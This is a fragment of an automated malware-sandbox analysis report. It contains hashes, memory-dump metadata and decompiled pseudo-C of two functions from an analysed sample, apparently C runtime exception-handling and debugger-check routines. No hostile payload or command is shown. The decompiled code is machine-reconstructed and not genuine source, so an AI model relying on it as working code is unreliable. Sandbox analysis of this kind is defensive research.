                                                          • Instruction Fuzzy Hash: CE117C75504680DFDB11CF14D584B56BBA1FB48314F24C6AAD8498B656C33AD88ACB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.572433710.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_80d000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e4edcd0d911e0ec600181ddb4ece967a02bf60166524698d1fee3a56553f774
                                                          • Instruction ID: 62fdea31166470252182a32c14a45cfb1ed9bb0369e0a6d63b2384302c5000c0
                                                          • Opcode Fuzzy Hash: 9e4edcd0d911e0ec600181ddb4ece967a02bf60166524698d1fee3a56553f774
                                                          • Instruction Fuzzy Hash: 9F014271808784AAE7208A6ACC80B63FFC8FF41324F18C01AED4C9F2C2C3799805C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.572433710.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_80d000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fef9bd9953ba05b77b4fba8617f7d19e0c6bed0281f7c5478460903a8f337ce7
                                                          • Instruction ID: 1fda823b0e1c62366cbeebb00f14e29aa1c00f0a66ef6120859af5c2a99163a0
                                                          • Opcode Fuzzy Hash: fef9bd9953ba05b77b4fba8617f7d19e0c6bed0281f7c5478460903a8f337ce7
                                                          • Instruction Fuzzy Hash: A7F04F71804784AEE7108A1ACC84B62FFD8EF51724F18C55AED485A286C3799C45CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E00401C83(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                          				char _v0;
                                                          				struct _EXCEPTION_POINTERS _v12;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v88;
                                                          				char _v92;
                                                          				intOrPtr _v608;
                                                          				intOrPtr _v612;
                                                          				void* _v616;
                                                          				intOrPtr _v620;
                                                          				char _v624;
                                                          				intOrPtr _v628;
                                                          				intOrPtr _v632;
                                                          				intOrPtr _v636;
                                                          				intOrPtr _v640;
                                                          				intOrPtr _v644;
                                                          				intOrPtr _v648;
                                                          				intOrPtr _v652;
                                                          				intOrPtr _v656;
                                                          				intOrPtr _v660;
                                                          				intOrPtr _v664;
                                                          				intOrPtr _v668;
                                                          				char _v808;
                                                          				char* _t39;
                                                          				long _t49;
                                                          				intOrPtr _t51;
                                                          				void* _t54;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t57;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t59;
                                                          				intOrPtr* _t60;
                                                          
                                                          				_t59 = __esi;
                                                          				_t58 = __edi;
                                                          				_t57 = __edx;
                                                          				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                          					_t55 = _a4;
                                                          					asm("int 0x29");
                                                          				}
                                                          				E00401E78(_t34);
                                                          				 *_t60 = 0x2cc;
                                                          				_v632 = E00402470(_t58,  &_v808, 0, 3);
                                                          				_v636 = _t55;
                                                          				_v640 = _t57;
                                                          				_v644 = _t51;
                                                          				_v648 = _t59;
                                                          				_v652 = _t58;
                                                          				_v608 = ss;
                                                          				_v620 = cs;
                                                          				_v656 = ds;
                                                          				_v660 = es;
                                                          				_v664 = fs;
                                                          				_v668 = gs;
                                                          				asm("pushfd");
                                                          				_pop( *_t15);
                                                          				_v624 = _v0;
                                                          				_t39 =  &_v0;
                                                          				_v612 = _t39;
                                                          				_v808 = 0x10001;
                                                          				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                          				E00402470(_t58,  &_v92, 0, 0x50);
                                                          				_v92 = 0x40000015;
                                                          				_v88 = 1;
                                                          				_v80 = _v0;
                                                          				_t28 = IsDebuggerPresent() - 1; // -1
                                                          				_v12.ExceptionRecord =  &_v92;
                                                          				asm("sbb bl, bl");
                                                          				_v12.ContextRecord =  &_v808;
                                                          				_t54 =  ~_t28 + 1;
                                                          				SetUnhandledExceptionFilter(0);
                                                          				_t49 = UnhandledExceptionFilter( &_v12);
                                                          				if(_t49 == 0 && _t54 == 0) {
                                                          					_push(3);
                                                          					return E00401E78(_t49);
                                                          				}
                                                          				return _t49;
                                                          			}


































                                                          0x00401c83
                                                          0x00401c83
                                                          0x00401c83
                                                          0x00401c97
                                                          0x00401c99
                                                          0x00401c9c
                                                          0x00401c9c
                                                          0x00401ca0
                                                          0x00401ca5
                                                          0x00401cbd
                                                          0x00401cc3
                                                          0x00401cc9
                                                          0x00401ccf
                                                          0x00401cd5
                                                          0x00401cdb
                                                          0x00401ce1
                                                          0x00401ce8
                                                          0x00401cef
                                                          0x00401cf6
                                                          0x00401cfd
                                                          0x00401d04
                                                          0x00401d0b
                                                          0x00401d0c
                                                          0x00401d15
                                                          0x00401d1b
                                                          0x00401d1e
                                                          0x00401d24
                                                          0x00401d33
                                                          0x00401d3f
                                                          0x00401d4a
                                                          0x00401d51
                                                          0x00401d58
                                                          0x00401d63
                                                          0x00401d6b
                                                          0x00401d74
                                                          0x00401d76
                                                          0x00401d79
                                                          0x00401d7b
                                                          0x00401d85
                                                          0x00401d8d
                                                          0x00401d93
                                                          0x00000000
                                                          0x00401d9a
                                                          0x00401d9d

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
                                                          • IsDebuggerPresent.KERNEL32 ref: 00401D5B
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                          • String ID:
                                                          • API String ID: 254469556-0
                                                          • Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                                                          • Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
                                                          • Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
                                                          • Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 71%
                                                          			E004038EB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                          				signed char* _v0;
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				char _v28;
                                                          				signed int _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				intOrPtr _v48;
                                                          				signed int _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				void _v64;
                                                          				signed int _v68;
                                                          				char _v84;
                                                          				intOrPtr _v88;
                                                          				signed int _v92;
                                                          				intOrPtr _v100;
                                                          				void _v104;
                                                          				intOrPtr* _v112;
                                                          				signed char* _v184;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				void* _t201;
                                                          				signed int _t202;
                                                          				char _t203;
                                                          				signed int _t205;
                                                          				signed int _t207;
                                                          				signed char* _t208;
                                                          				signed int _t209;
                                                          				signed int _t210;
                                                          				signed int _t214;
                                                          				void* _t217;
                                                          				signed char* _t220;
                                                          				void* _t222;
                                                          				void* _t224;
                                                          				signed char _t228;
                                                          				signed int _t229;
                                                          				void* _t231;
                                                          				void* _t234;
                                                          				void* _t237;
                                                          				signed int _t247;
                                                          				void* _t250;
                                                          				intOrPtr* _t251;
                                                          				signed int _t252;
                                                          				intOrPtr _t253;
                                                          				signed int _t254;
                                                          				void* _t259;
                                                          				void* _t264;
                                                          				void* _t265;
                                                          				signed int _t269;
                                                          				signed char* _t270;
                                                          				intOrPtr* _t271;
                                                          				signed char _t272;
                                                          				signed int _t273;
                                                          				signed int _t274;
                                                          				intOrPtr* _t276;
                                                          				signed int _t277;
                                                          				signed int _t278;
                                                          				signed int _t283;
                                                          				signed int _t290;
                                                          				signed int _t291;
                                                          				signed int _t294;
                                                          				signed int _t296;
                                                          				signed char* _t297;
                                                          				signed int _t298;
                                                          				signed char _t299;
                                                          				signed int* _t301;
                                                          				signed char* _t304;
                                                          				signed int _t314;
                                                          				signed int _t315;
                                                          				signed int _t317;
                                                          				signed int _t327;
                                                          				void* _t329;
                                                          				void* _t331;
                                                          				void* _t332;
                                                          				void* _t333;
                                                          				void* _t334;
                                                          
                                                          				_t296 = __edx;
                                                          				_push(_t315);
                                                          				_t301 = _a20;
                                                          				_v20 = 0;
                                                          				_v28 = 0;
                                                          				_t275 = E004044A9(_a8, _a16, _t301);
                                                          				_t332 = _t331 + 0xc;
                                                          				_v12 = _t275;
                                                          				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                                                          					L67:
                                                          					_t201 = E0040579A(_t270, _t275, _t296, _t315);
                                                          					asm("int3");
                                                          					_t329 = _t332;
                                                          					_t333 = _t332 - 0x38;
                                                          					_push(_t270);
                                                          					_t271 = _v112;
                                                          					__eflags =  *_t271 - 0x80000003;
                                                          					if( *_t271 == 0x80000003) {
                                                          						return _t201;
                                                          					} else {
                                                          						_push(_t315);
                                                          						_push(_t301);
                                                          						_t202 = E004029B3(_t271, _t275, _t296, _t315);
                                                          						__eflags =  *(_t202 + 8);
                                                          						if( *(_t202 + 8) != 0) {
                                                          							__imp__EncodePointer(0);
                                                          							_t315 = _t202;
                                                          							_t222 = E004029B3(_t271, _t275, _t296, _t315);
                                                          							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                                                          							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                                                          								__eflags =  *_t271 - 0xe0434f4d;
                                                          								if( *_t271 != 0xe0434f4d) {
                                                          									__eflags =  *_t271 - 0xe0434352;
                                                          									if( *_t271 != 0xe0434352) {
                                                          										_t214 = E00402E31(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                                                          										_t333 = _t333 + 0x1c;
                                                          										__eflags = _t214;
                                                          										if(_t214 != 0) {
                                                          											L84:
                                                          											return _t214;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						_t203 = _a16;
                                                          						_v28 = _t203;
                                                          						_v24 = 0;
                                                          						__eflags =  *(_t203 + 0xc);
                                                          						if( *(_t203 + 0xc) > 0) {
                                                          							_push(_a24);
                                                          							E00402D64(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                                                          							_t298 = _v40;
                                                          							_t334 = _t333 + 0x18;
                                                          							_t214 = _v44;
                                                          							_v20 = _t214;
                                                          							_v12 = _t298;
                                                          							__eflags = _t298 - _v32;
                                                          							if(_t298 >= _v32) {
                                                          								goto L84;
                                                          							}
                                                          							_t277 = _t298 * 0x14;
                                                          							__eflags = _t277;
                                                          							_v16 = _t277;
                                                          							do {
                                                          								_t278 = 5;
                                                          								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                                                          								_t334 = _t334 + 0xc;
                                                          								__eflags = _v64 - _t217;
                                                          								if(_v64 > _t217) {
                                                          									goto L83;
                                                          								}
                                                          								__eflags = _t217 - _v60;
                                                          								if(_t217 > _v60) {
                                                          									goto L83;
                                                          								}
                                                          								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                                                          								_t283 = _t220[4];
                                                          								__eflags = _t283;
                                                          								if(_t283 == 0) {
                                                          									L81:
                                                          									__eflags =  *_t220 & 0x00000040;
                                                          									if(( *_t220 & 0x00000040) == 0) {
                                                          										_push(0);
                                                          										_push(1);
                                                          										E0040386B(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
                                                          										_t298 = _v12;
                                                          										_t334 = _t334 + 0x30;
                                                          									}
                                                          									goto L83;
                                                          								}
                                                          								__eflags =  *((char*)(_t283 + 8));
                                                          								if( *((char*)(_t283 + 8)) != 0) {
                                                          									goto L83;
                                                          								}
                                                          								goto L81;
                                                          								L83:
                                                          								_t298 = _t298 + 1;
                                                          								_t214 = _v20;
                                                          								_t277 = _v16 + 0x14;
                                                          								_v12 = _t298;
                                                          								_v16 = _t277;
                                                          								__eflags = _t298 - _v32;
                                                          							} while (_t298 < _v32);
                                                          							goto L84;
                                                          						}
                                                          						E0040579A(_t271, _t275, _t296, _t315);
                                                          						asm("int3");
                                                          						_push(_t329);
                                                          						_t297 = _v184;
                                                          						_push(_t271);
                                                          						_push(_t315);
                                                          						_push(0);
                                                          						_t205 = _t297[4];
                                                          						__eflags = _t205;
                                                          						if(_t205 == 0) {
                                                          							L109:
                                                          							_t207 = 1;
                                                          							__eflags = 1;
                                                          						} else {
                                                          							_t276 = _t205 + 8;
                                                          							__eflags =  *_t276;
                                                          							if( *_t276 == 0) {
                                                          								goto L109;
                                                          							} else {
                                                          								__eflags =  *_t297 & 0x00000080;
                                                          								_t304 = _v0;
                                                          								if(( *_t297 & 0x00000080) == 0) {
                                                          									L91:
                                                          									_t272 = _t304[4];
                                                          									_t317 = 0;
                                                          									__eflags = _t205 - _t272;
                                                          									if(_t205 == _t272) {
                                                          										L101:
                                                          										__eflags =  *_t304 & 0x00000002;
                                                          										if(( *_t304 & 0x00000002) == 0) {
                                                          											L103:
                                                          											_t208 = _a4;
                                                          											__eflags =  *_t208 & 0x00000001;
                                                          											if(( *_t208 & 0x00000001) == 0) {
                                                          												L105:
                                                          												__eflags =  *_t208 & 0x00000002;
                                                          												if(( *_t208 & 0x00000002) == 0) {
                                                          													L107:
                                                          													_t317 = 1;
                                                          													__eflags = 1;
                                                          												} else {
                                                          													__eflags =  *_t297 & 0x00000002;
                                                          													if(( *_t297 & 0x00000002) != 0) {
                                                          														goto L107;
                                                          													}
                                                          												}
                                                          											} else {
                                                          												__eflags =  *_t297 & 0x00000001;
                                                          												if(( *_t297 & 0x00000001) != 0) {
                                                          													goto L105;
                                                          												}
                                                          											}
                                                          										} else {
                                                          											__eflags =  *_t297 & 0x00000008;
                                                          											if(( *_t297 & 0x00000008) != 0) {
                                                          												goto L103;
                                                          											}
                                                          										}
                                                          										_t207 = _t317;
                                                          									} else {
                                                          										_t184 = _t272 + 8; // 0x6e
                                                          										_t209 = _t184;
                                                          										while(1) {
                                                          											_t273 =  *_t276;
                                                          											__eflags = _t273 -  *_t209;
                                                          											if(_t273 !=  *_t209) {
                                                          												break;
                                                          											}
                                                          											__eflags = _t273;
                                                          											if(_t273 == 0) {
                                                          												L97:
                                                          												_t210 = _t317;
                                                          											} else {
                                                          												_t274 =  *((intOrPtr*)(_t276 + 1));
                                                          												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
                                                          												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
                                                          													break;
                                                          												} else {
                                                          													_t276 = _t276 + 2;
                                                          													_t209 = _t209 + 2;
                                                          													__eflags = _t274;
                                                          													if(_t274 != 0) {
                                                          														continue;
                                                          													} else {
                                                          														goto L97;
                                                          													}
                                                          												}
                                                          											}
                                                          											L99:
                                                          											__eflags = _t210;
                                                          											if(_t210 == 0) {
                                                          												goto L101;
                                                          											} else {
                                                          												_t207 = 0;
                                                          											}
                                                          											goto L110;
                                                          										}
                                                          										asm("sbb eax, eax");
                                                          										_t210 = _t209 | 0x00000001;
                                                          										__eflags = _t210;
                                                          										goto L99;
                                                          									}
                                                          								} else {
                                                          									__eflags =  *_t304 & 0x00000010;
                                                          									if(( *_t304 & 0x00000010) != 0) {
                                                          										goto L109;
                                                          									} else {
                                                          										goto L91;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						L110:
                                                          						return _t207;
                                                          					}
                                                          				} else {
                                                          					_t270 = _a4;
                                                          					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
                                                          						L22:
                                                          						_t296 = _a12;
                                                          						_v8 = _t296;
                                                          						goto L24;
                                                          					} else {
                                                          						_t315 = 0;
                                                          						if(_t270[0x1c] != 0) {
                                                          							goto L22;
                                                          						} else {
                                                          							_t224 = E004029B3(_t270, _t275, _t296, 0);
                                                          							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
                                                          								L61:
                                                          								return _t224;
                                                          							} else {
                                                          								_t270 =  *(E004029B3(_t270, _t275, _t296, 0) + 0x10);
                                                          								_t259 = E004029B3(_t270, _t275, _t296, 0);
                                                          								_v28 = 1;
                                                          								_v8 =  *((intOrPtr*)(_t259 + 0x14));
                                                          								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
                                                          									goto L67;
                                                          								} else {
                                                          									if( *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
                                                          										L23:
                                                          										_t296 = _v8;
                                                          										_t275 = _v12;
                                                          										L24:
                                                          										_v52 = _t301;
                                                          										_v48 = 0;
                                                          										__eflags =  *_t270 - 0xe06d7363;
                                                          										if( *_t270 != 0xe06d7363) {
                                                          											L57:
                                                          											__eflags = _t301[3];
                                                          											if(_t301[3] <= 0) {
                                                          												goto L60;
                                                          											} else {
                                                          												__eflags = _a24;
                                                          												if(_a24 != 0) {
                                                          													goto L67;
                                                          												} else {
                                                          													_push(_a32);
                                                          													_push(_a28);
                                                          													_push(_t275);
                                                          													_push(_t301);
                                                          													_push(_a16);
                                                          													_push(_t296);
                                                          													_push(_a8);
                                                          													_push(_t270);
                                                          													L68();
                                                          													_t332 = _t332 + 0x20;
                                                          													goto L60;
                                                          												}
                                                          											}
                                                          										} else {
                                                          											__eflags = _t270[0x10] - 3;
                                                          											if(_t270[0x10] != 3) {
                                                          												goto L57;
                                                          											} else {
                                                          												__eflags = _t270[0x14] - 0x19930520;
                                                          												if(_t270[0x14] == 0x19930520) {
                                                          													L29:
                                                          													_t315 = _a32;
                                                          													__eflags = _t301[3];
                                                          													if(_t301[3] > 0) {
                                                          														_push(_a28);
                                                          														E00402D64(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
                                                          														_t296 = _v64;
                                                          														_t332 = _t332 + 0x18;
                                                          														_t247 = _v68;
                                                          														_v44 = _t247;
                                                          														_v16 = _t296;
                                                          														__eflags = _t296 - _v56;
                                                          														if(_t296 < _v56) {
                                                          															_t290 = _t296 * 0x14;
                                                          															__eflags = _t290;
                                                          															_v32 = _t290;
                                                          															do {
                                                          																_t291 = 5;
                                                          																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
                                                          																_t332 = _t332 + 0xc;
                                                          																__eflags = _v104 - _t250;
                                                          																if(_v104 <= _t250) {
                                                          																	__eflags = _t250 - _v100;
                                                          																	if(_t250 <= _v100) {
                                                          																		_t294 = 0;
                                                          																		_v20 = 0;
                                                          																		__eflags = _v92;
                                                          																		if(_v92 != 0) {
                                                          																			_t299 = _t270[0x1c];
                                                          																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
                                                          																			_t252 = _t251 + 4;
                                                          																			__eflags = _t252;
                                                          																			_v36 = _t252;
                                                          																			_t253 = _v88;
                                                          																			_v40 =  *_t251;
                                                          																			_v24 = _t253;
                                                          																			do {
                                                          																				asm("movsd");
                                                          																				asm("movsd");
                                                          																				asm("movsd");
                                                          																				asm("movsd");
                                                          																				_t327 = _v40;
                                                          																				_t314 = _v36;
                                                          																				__eflags = _t327;
                                                          																				if(_t327 <= 0) {
                                                          																					goto L40;
                                                          																				} else {
                                                          																					while(1) {
                                                          																						_push(_t299);
                                                          																						_push( *_t314);
                                                          																						_t254 =  &_v84;
                                                          																						_push(_t254);
                                                          																						L87();
                                                          																						_t332 = _t332 + 0xc;
                                                          																						__eflags = _t254;
                                                          																						if(_t254 != 0) {
                                                          																							break;
                                                          																						}
                                                          																						_t299 = _t270[0x1c];
                                                          																						_t327 = _t327 - 1;
                                                          																						_t314 = _t314 + 4;
                                                          																						__eflags = _t327;
                                                          																						if(_t327 > 0) {
                                                          																							continue;
                                                          																						} else {
                                                          																							_t294 = _v20;
                                                          																							_t253 = _v24;
                                                          																							goto L40;
                                                          																						}
                                                          																						goto L43;
                                                          																					}
                                                          																					_push(_a24);
                                                          																					_push(_v28);
                                                          																					E0040386B(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
                                                          																					_t332 = _t332 + 0x30;
                                                          																				}
                                                          																				L43:
                                                          																				_t296 = _v16;
                                                          																				goto L44;
                                                          																				L40:
                                                          																				_t294 = _t294 + 1;
                                                          																				_t253 = _t253 + 0x10;
                                                          																				_v20 = _t294;
                                                          																				_v24 = _t253;
                                                          																				__eflags = _t294 - _v92;
                                                          																			} while (_t294 != _v92);
                                                          																			goto L43;
                                                          																		}
                                                          																	}
                                                          																}
                                                          																L44:
                                                          																_t296 = _t296 + 1;
                                                          																_t247 = _v44;
                                                          																_t290 = _v32 + 0x14;
                                                          																_v16 = _t296;
                                                          																_v32 = _t290;
                                                          																__eflags = _t296 - _v56;
                                                          															} while (_t296 < _v56);
                                                          															_t301 = _a20;
                                                          															_t315 = _a32;
                                                          														}
                                                          													}
                                                          													__eflags = _a24;
                                                          													if(__eflags != 0) {
                                                          														_push(1);
                                                          														E0040263C(_t270, _t301, _t315, __eflags);
                                                          														_t275 = _t270;
                                                          													}
                                                          													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
                                                          													if(( *_t301 & 0x1fffffff) < 0x19930521) {
                                                          														L60:
                                                          														_t224 = E004029B3(_t270, _t275, _t296, _t315);
                                                          														__eflags =  *(_t224 + 0x1c);
                                                          														if( *(_t224 + 0x1c) != 0) {
                                                          															goto L67;
                                                          														} else {
                                                          															goto L61;
                                                          														}
                                                          													} else {
                                                          														_t228 = _t301[8] >> 2;
                                                          														__eflags = _t301[7];
                                                          														if(_t301[7] != 0) {
                                                          															__eflags = _t228 & 0x00000001;
                                                          															if((_t228 & 0x00000001) == 0) {
                                                          																_push(_t301[7]);
                                                          																_t229 = E0040436A(_t270, _t301, _t315, _t270);
                                                          																_pop(_t275);
                                                          																__eflags = _t229;
                                                          																if(_t229 == 0) {
                                                          																	goto L64;
                                                          																} else {
                                                          																	goto L60;
                                                          																}
                                                          															} else {
                                                          																goto L54;
                                                          															}
                                                          														} else {
                                                          															__eflags = _t228 & 0x00000001;
                                                          															if((_t228 & 0x00000001) == 0) {
                                                          																goto L60;
                                                          															} else {
                                                          																__eflags = _a28;
                                                          																if(_a28 != 0) {
                                                          																	goto L60;
                                                          																} else {
                                                          																	L54:
                                                          																	 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                                                          																	_t237 = E004029B3(_t270, _t275, _t296, _t315);
                                                          																	_t286 = _v8;
                                                          																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
                                                          																	goto L62;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													__eflags = _t270[0x14] - 0x19930521;
                                                          													if(_t270[0x14] == 0x19930521) {
                                                          														goto L29;
                                                          													} else {
                                                          														__eflags = _t270[0x14] - 0x19930522;
                                                          														if(_t270[0x14] != 0x19930522) {
                                                          															goto L57;
                                                          														} else {
                                                          															goto L29;
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_v16 =  *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c));
                                                          										_t264 = E004029B3(_t270, _t275, _t296, _t315);
                                                          										_push(_v16);
                                                          										 *(_t264 + 0x1c) = _t315;
                                                          										_t265 = E0040436A(_t270, _t301, _t315, _t270);
                                                          										_pop(_t286);
                                                          										if(_t265 != 0) {
                                                          											goto L23;
                                                          										} else {
                                                          											_t301 = _v16;
                                                          											_t353 =  *_t301 - _t315;
                                                          											if( *_t301 <= _t315) {
                                                          												L62:
                                                          												E004056DE(_t270, _t286, _t296, _t301, _t315, __eflags);
                                                          											} else {
                                                          												while(1) {
                                                          													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
                                                          													if(E00403FC6( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4158ac) != 0) {
                                                          														goto L63;
                                                          													}
                                                          													_t315 = _t315 + 0x10;
                                                          													_t269 = _v20 + 1;
                                                          													_v20 = _t269;
                                                          													_t353 = _t269 -  *_t301;
                                                          													if(_t269 >=  *_t301) {
                                                          														goto L62;
                                                          													} else {
                                                          														continue;
                                                          													}
                                                          													goto L63;
                                                          												}
                                                          											}
                                                          											L63:
                                                          											_push(1);
                                                          											_push(_t270);
                                                          											E0040263C(_t270, _t301, _t315, __eflags);
                                                          											_t275 =  &_v64;
                                                          											E00403F71( &_v64);
                                                          											E0040225B( &_v64, 0x413554);
                                                          											L64:
                                                          											 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
                                                          											_t231 = E004029B3(_t270, _t275, _t296, _t315);
                                                          											_t275 = _v8;
                                                          											 *(_t231 + 0x14) = _v8;
                                                          											__eflags = _t315;
                                                          											if(_t315 == 0) {
                                                          												_t315 = _a8;
                                                          											}
                                                          											E00402F57(_t275, _t315, _t270);
                                                          											E0040426A(_a8, _a16, _t301);
                                                          											_t234 = E00404427(_t301);
                                                          											_t332 = _t332 + 0x10;
                                                          											_push(_t234);
                                                          											E004041E1(_t270, _t275, _t296, _t301, _t315, __eflags);
                                                          											goto L67;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}






















































































                                                          0x004038eb
                                                          0x004038f2
                                                          0x004038f4
                                                          0x004038fd
                                                          0x00403903
                                                          0x0040390b
                                                          0x0040390d
                                                          0x00403910
                                                          0x00403916
                                                          0x00403c8a
                                                          0x00403c8a
                                                          0x00403c8f
                                                          0x00403c91
                                                          0x00403c93
                                                          0x00403c96
                                                          0x00403c97
                                                          0x00403c9a
                                                          0x00403ca0
                                                          0x00403dbf
                                                          0x00403ca6
                                                          0x00403ca6
                                                          0x00403ca7
                                                          0x00403ca8
                                                          0x00403caf
                                                          0x00403cb2
                                                          0x00403cb5
                                                          0x00403cbb
                                                          0x00403cbd
                                                          0x00403cc2
                                                          0x00403cc5
                                                          0x00403cc7
                                                          0x00403ccd
                                                          0x00403ccf
                                                          0x00403cd5
                                                          0x00403cea
                                                          0x00403cef
                                                          0x00403cf2
                                                          0x00403cf4
                                                          0x00403dbb
                                                          0x00000000
                                                          0x00403dbc
                                                          0x00403cf4
                                                          0x00403cd5
                                                          0x00403ccd
                                                          0x00403cc5
                                                          0x00403cfa
                                                          0x00403cfd
                                                          0x00403d00
                                                          0x00403d03
                                                          0x00403d06
                                                          0x00403d0c
                                                          0x00403d1e
                                                          0x00403d23
                                                          0x00403d26
                                                          0x00403d29
                                                          0x00403d2c
                                                          0x00403d2f
                                                          0x00403d32
                                                          0x00403d35
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d3b
                                                          0x00403d3b
                                                          0x00403d3e
                                                          0x00403d41
                                                          0x00403d50
                                                          0x00403d51
                                                          0x00403d51
                                                          0x00403d53
                                                          0x00403d56
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d58
                                                          0x00403d5b
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d69
                                                          0x00403d6b
                                                          0x00403d6e
                                                          0x00403d70
                                                          0x00403d78
                                                          0x00403d78
                                                          0x00403d7b
                                                          0x00403d7d
                                                          0x00403d7f
                                                          0x00403d9b
                                                          0x00403da0
                                                          0x00403da3
                                                          0x00403da3
                                                          0x00000000
                                                          0x00403d7b
                                                          0x00403d72
                                                          0x00403d76
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403da6
                                                          0x00403da9
                                                          0x00403daa
                                                          0x00403dad
                                                          0x00403db0
                                                          0x00403db3
                                                          0x00403db6
                                                          0x00403db6
                                                          0x00000000
                                                          0x00403d41
                                                          0x00403dc0
                                                          0x00403dc5
                                                          0x00403dc6
                                                          0x00403dc9
                                                          0x00403dcc
                                                          0x00403dcd
                                                          0x00403dce
                                                          0x00403dcf
                                                          0x00403dd2
                                                          0x00403dd4
                                                          0x00403e4c
                                                          0x00403e4e
                                                          0x00403e4e
                                                          0x00403dd6
                                                          0x00403dd6
                                                          0x00403dd9
                                                          0x00403ddc
                                                          0x00000000
                                                          0x00403dde
                                                          0x00403dde
                                                          0x00403de1
                                                          0x00403de4
                                                          0x00403deb
                                                          0x00403deb
                                                          0x00403dee
                                                          0x00403df0
                                                          0x00403df2
                                                          0x00403e24
                                                          0x00403e24
                                                          0x00403e27
                                                          0x00403e2e
                                                          0x00403e2e
                                                          0x00403e31
                                                          0x00403e34
                                                          0x00403e3b
                                                          0x00403e3b
                                                          0x00403e3e
                                                          0x00403e45
                                                          0x00403e47
                                                          0x00403e47
